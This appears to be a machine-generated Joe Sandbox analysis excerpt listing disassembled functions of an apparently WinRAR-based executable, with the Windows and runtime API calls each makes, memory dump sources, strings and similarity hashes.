                                                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CB1251
                                                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CB1263
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CB1274
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1284
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1294
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CB12CF
                                                                                              • __aullrem.LIBCMT ref: 00CB1379
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                              • String ID:
                                                                                              • API String ID: 1247370737-0
                                                                                              • Opcode ID: 33de36c04a18531532a80de507fc1e3fee979134e951d5b0325b930577b594da
                                                                                              • Instruction ID: 48e5770b271d2b31f2a99f3c35ef2168832c1081158ba443130f047f96677e48
                                                                                              • Opcode Fuzzy Hash: 33de36c04a18531532a80de507fc1e3fee979134e951d5b0325b930577b594da
                                                                                              • Instruction Fuzzy Hash: E241FBB15083459FC710DF65C884AAFBBE9FB88314F44892EF996C2250E738E649DB52
                                                                                              Function 00CA2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00CA2536
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                              • API String ID: 3053425827-2277559157
                                                                                              • Opcode ID: fb8bb202728c07608755bb8d790101ef1a32c3652cd4fa675f7289d475251fb5
                                                                                              • Instruction ID: a82f7c690878b7ea72cc495ec56ad8b9812c442f3f8ba043d28e4e7bba2a7351
                                                                                              • Opcode Fuzzy Hash: fb8bb202728c07608755bb8d790101ef1a32c3652cd4fa675f7289d475251fb5
                                                                                              • Instruction Fuzzy Hash: 00F168716043529BCB24DF2C84D5BFE77996F9230CF08456DFC869B283CB648A49D7A2
                                                                                              Function 00CB9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                                                              • API String ID: 176396367-3568243669
                                                                                              • Opcode ID: 6cc8543d3b7edaf92461e54abc5594595420a9e52a0d7faf9e14c4be95a393eb
                                                                                              • Instruction ID: 8ddb59badfdf87eaf157c227d1c6b33b07ee37b8d68a7ca5b5216e3e9cf78f92
                                                                                              • Opcode Fuzzy Hash: 6cc8543d3b7edaf92461e54abc5594595420a9e52a0d7faf9e14c4be95a393eb
                                                                                              • Instruction Fuzzy Hash: C851E56674036395DB309A769822BF673E0DFA1750F69442AFFD18B2C0FB75CE818261
                                                                                              Function 00CCF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CCFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00CCF6CF
                                                                                              • __fassign.LIBCMT ref: 00CCF74A
                                                                                              • __fassign.LIBCMT ref: 00CCF765
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CCF78B
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00CCFE02,00000000,?,?,?,?,?,?,?,?,?,00CCFE02,00000000), ref: 00CCF7AA
                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,00CCFE02,00000000,?,?,?,?,?,?,?,?,?,00CCFE02,00000000), ref: 00CCF7E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: c58f7dbdaae0060e1faa650bfbe3b2dc10ce4bdd79ae408f4ae6a6a23157b047
                                                                                              • Instruction ID: 76a4c0ba8af459320be2e094976cda4bbcd3385f8fd01ee0d9d00af5c6e2c0e2
                                                                                              • Opcode Fuzzy Hash: c58f7dbdaae0060e1faa650bfbe3b2dc10ce4bdd79ae408f4ae6a6a23157b047
                                                                                              • Instruction Fuzzy Hash: 805141B19002499FDB10CFA8DC85FEEBBF5EF09310F14416EE555E7291D670AA42CBA1
                                                                                              Function 00CC2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC2937
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CC293F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC29C8
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00CC29F3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC2A48
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 5914e531d034b6575fd9234da831537f40162a669b81923a9e105ea8c2f4f716
                                                                                              • Instruction ID: bb4c7b7e56d3235fab02c3f049201f1280f5cdc4f018ca9f2fdd4678b66c38be
                                                                                              • Opcode Fuzzy Hash: 5914e531d034b6575fd9234da831537f40162a669b81923a9e105ea8c2f4f716
                                                                                              • Instruction Fuzzy Hash: AE41D534E00248AFCF10EF69C885F9EBBB5EF44324F14805AE819AB392D771DA51DB91
                                                                                              Function 00CB9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00CB9EEE
                                                                                              • GetWindowRect.USER32(?,00000000), ref: 00CB9F44
                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00CB9FDB
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00CB9FE3
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00CB9FF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$RectText
                                                                                              • String ID: RarHtmlClassName
                                                                                              • API String ID: 3937224194-1658105358
                                                                                              • Opcode ID: 667abde37daee70284671fb4a908ba00774bd88d12186a8f2f950b7815841669
                                                                                              • Instruction ID: 13de0d52a234b3e9722d96dec1b1db3ed4de1cb01346f36e9779646f7f2a56a0
                                                                                              • Opcode Fuzzy Hash: 667abde37daee70284671fb4a908ba00774bd88d12186a8f2f950b7815841669
                                                                                              • Instruction Fuzzy Hash: 0F41A031008314EFCB216FA5EC48BAB7BACEF48711F008559F95A9A156DB34DA54CBA2
                                                                                              Function 00CB9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 176396367-3743748572
                                                                                              • Opcode ID: fb61744195bf9a5fa91c6a51e3777648c7695ff135472f084e9fccc7974eff90
                                                                                              • Instruction ID: aeb9cff46b9f3cbfba9834b029291d1b94580589d7ee34d1338d83c6222083b2
                                                                                              • Opcode Fuzzy Hash: fb61744195bf9a5fa91c6a51e3777648c7695ff135472f084e9fccc7974eff90
                                                                                              • Instruction Fuzzy Hash: 8A31403264434556DA34AB54AC42BFB73A4EB50720F50842FFAA6972C0FB70EF4193A5
                                                                                              Function 00CCC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CCC868: _free.LIBCMT ref: 00CCC891
                                                                                              • _free.LIBCMT ref: 00CCC8F2
                                                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                                                              • _free.LIBCMT ref: 00CCC8FD
                                                                                              • _free.LIBCMT ref: 00CCC908
                                                                                              • _free.LIBCMT ref: 00CCC95C
                                                                                              • _free.LIBCMT ref: 00CCC967
                                                                                              • _free.LIBCMT ref: 00CCC972
                                                                                              • _free.LIBCMT ref: 00CCC97D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction ID: 8508b89f69b22fdd97d766211fc38b5f9eb3e7f9c7b61647e3a2991f987d99f6
                                                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction Fuzzy Hash: 20110D71980B05AAE520B7B1DC87FCB7BBC9F04B00F804C1DF29E660D2DA65E509A750
                                                                                              Function 00CBE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CBE669,00CBE5CC,00CBE86D), ref: 00CBE605
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CBE61B
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CBE630
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                              • API String ID: 667068680-1718035505
                                                                                              • Opcode ID: 0421938d4c7277efade8b5b8b26ca7339f29aad1d82403f1907fd04c228025e2
                                                                                              • Instruction ID: ce3ab5f329f79f99fd185c4e38cdc4581cc7bcbe8256b5c84833195bdee5a488
                                                                                              • Opcode Fuzzy Hash: 0421938d4c7277efade8b5b8b26ca7339f29aad1d82403f1907fd04c228025e2
                                                                                              • Instruction Fuzzy Hash: 74F0F635B8176A9F9F224F665C847EAB3C86E25F41B04043AFD15D3340FB10CE50ABA5
                                                                                              Function 00CB146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB14C2
                                                                                                • Part of subcall function 00CAB146: GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CB14E6
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CB1500
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CB1513
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1523
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1533
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: 23132968e417fe9b39d11df200bc3493d4a4737a8e35205c5e93ecc36037a543
                                                                                              • Instruction ID: 967bfbffa5bbfcdbd7a5123f3705f1f41709e0e06e8edac2e1a57c0fa998103d
                                                                                              • Opcode Fuzzy Hash: 23132968e417fe9b39d11df200bc3493d4a4737a8e35205c5e93ecc36037a543
                                                                                              • Instruction Fuzzy Hash: 6931E875108346ABC704DFA8C884A9FB7F8BF98714F444A1EF999C3210E734D649CBA6
                                                                                              Function 00CC2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00CC2AF1,00CC02FC,00CBFA34), ref: 00CC2B08
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CC2B16
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC2B2F
                                                                                              • SetLastError.KERNEL32(00000000,00CC2AF1,00CC02FC,00CBFA34), ref: 00CC2B81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 818b522b8c979288e54f20ba6fea8aa2d3e7e9601857d8a47208cc810f70c4ba
                                                                                              • Instruction ID: 85018138de8df2f37b817aeca30a7f3bd3f3e3f2886447bb7474e985f1c3f899
                                                                                              • Opcode Fuzzy Hash: 818b522b8c979288e54f20ba6fea8aa2d3e7e9601857d8a47208cc810f70c4ba
                                                                                              • Instruction Fuzzy Hash: 8F01F23221A722AFE6642B75FC95F2F2B99EF41B74B60473FF122590E0EF115E01A244
                                                                                              Function 00CC97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00CE1030,00CC4674,00CE1030,?,?,00CC3F73,00000050,?,00CE1030,00000200), ref: 00CC97E9
                                                                                              • _free.LIBCMT ref: 00CC981C
                                                                                              • _free.LIBCMT ref: 00CC9844
                                                                                              • SetLastError.KERNEL32(00000000,?,00CE1030,00000200), ref: 00CC9851
                                                                                              • SetLastError.KERNEL32(00000000,?,00CE1030,00000200), ref: 00CC985D
                                                                                              • _abort.LIBCMT ref: 00CC9863
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: 3e50cb498cc611eca23747828d66c7b2230e4fcc60a630e6bcd33f03257d9da0
                                                                                              • Instruction ID: f17bf1e2931b28f6c61db2aa5de233d0ab31d72a52a63d88c37acc99c74bff15
                                                                                              • Opcode Fuzzy Hash: 3e50cb498cc611eca23747828d66c7b2230e4fcc60a630e6bcd33f03257d9da0
                                                                                              • Instruction Fuzzy Hash: D9F0223610160266C6523338FC0EF2F2B69CFD2B35F25003DF629A31D2EE308D06A266
                                                                                              Function 00CBDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CBDC47
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBDC61
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBDC72
                                                                                              • TranslateMessage.USER32(?), ref: 00CBDC7C
                                                                                              • DispatchMessageW.USER32(?), ref: 00CBDC86
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CBDC91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              • Opcode ID: 429d20a1f09219ab811ac04a18f5b1632411be6f957f44b6feff585238e7a34e
                                                                                              • Instruction ID: 242c7749d7a0ce8705a077b684fd15e47fbb43a09290e7fb815f35b02531c273
                                                                                              • Opcode Fuzzy Hash: 429d20a1f09219ab811ac04a18f5b1632411be6f957f44b6feff585238e7a34e
                                                                                              • Instruction Fuzzy Hash: E2F03C72A02219BBCB206BA5DC4CEDF7F6DEF41791F004011B51AE2151E675D646C7B1
                                                                                              Function 00CAC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                                                • Part of subcall function 00CAB92D: _wcsrchr.LIBVCRUNTIME ref: 00CAB944
                                                                                              • _wcslen.LIBCMT ref: 00CAC197
                                                                                              • _wcslen.LIBCMT ref: 00CAC1DF
                                                                                              Strings
                                                                                              Memory Dump Source
